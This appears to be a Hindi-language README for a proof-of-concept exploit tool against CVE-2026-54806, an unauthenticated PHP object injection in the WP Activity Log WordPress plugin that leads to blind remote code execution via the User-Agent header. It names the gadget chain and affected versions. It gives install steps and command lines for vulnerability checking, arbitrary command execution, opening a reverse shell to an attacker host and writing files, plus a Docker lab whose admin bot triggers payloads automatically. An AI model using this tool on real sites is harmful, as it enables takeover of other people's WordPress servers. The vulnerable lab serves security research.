CVE-2026-54806 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: WP Activity Log प्लगइन में अनधिकृत PHP ऑब्जेक्ट इंजेक्शन जो User-Agent हेडर के माध्यम से ब्लाइंड RCE सक्षम करता है। भेद्यता जाँच, कमांड निष्पादन, रिवर्स शेल, और फ़ाइल लेखन सुविधाओं के साथ एक स्व-निहित Docker लैब शामिल है।
CVE-2026-54806, WP Activity Log वर्डप्रेस प्लगइन (wp-security-audit-log) में Melapress द्वारा एक गंभीर (CVSS 9.8) अनप्रमाणित PHP ऑब्जेक्ट इंजेक्शन भेद्यता है। एक अनप्रमाणित हमलावर किसी भी अनुरोध पर User-Agent हेडर के माध्यम से सीरियलाइज़्ड PHP ऑब्जेक्ट इंजेक्ट कर सकता है जो एक लॉग इवेंट (जैसे असफल लॉगिन) को ट्रिगर करता है। इंजेक्ट किया गया पेलोड डेटाबेस में संग्रहीत होता है और जब कोई व्यवस्थापक वर्डप्रेस डैशबोर्ड पर जाता है तो बिना किसी प्रतिबंध के डिसीरियलाइज़ हो जाता है, जिससे ब्लाइंड रिमोट कोड एक्जीक्यूशन (हमलावर को कोई आउटपुट वापस नहीं आता) होता है।
प्रभावित प्लगइन: WP Activity Log <= 5.6.3.1 (5.6.4 में ठीक किया गया)
RCE के लिए आवश्यक: WordPress 6.4.0 - 6.4.1 — यह PoC WP_HTML_Token गैजेट का उपयोग करता है, जो एकमात्र WP कोर चेन है जिसमें सभी सार्वजनिक गुण हैं जो sanitize_text_field() से बच जाते हैं और 255-अक्षर कॉलम सीमा में फिट होते हैं।
--check--command के माध्यम से कमांड इंजेक्ट करें--shell के माध्यम से रिवर्स शेल इंजेक्ट करें--write-file के माध्यम से फ़ाइलें लिखेंgit clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>
WordPress 6.4.1 + WP Activity Log 5.6.3.1 के साथ स्व-निहित प्रयोगशाला। विवरण के लिए DOCKER.md देखें।
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
प्रयोगशाला में एक admin-bot शामिल है जो हर 60 सेकंड में डैशबोर्ड पर जाता है, इसलिए इंजेक्ट किए गए पेलोड स्वचालित रूप से फायर होते हैं — किसी मैन्युअल इंटरैक्शन की आवश्यकता नहीं है।
यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। निर्माता इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।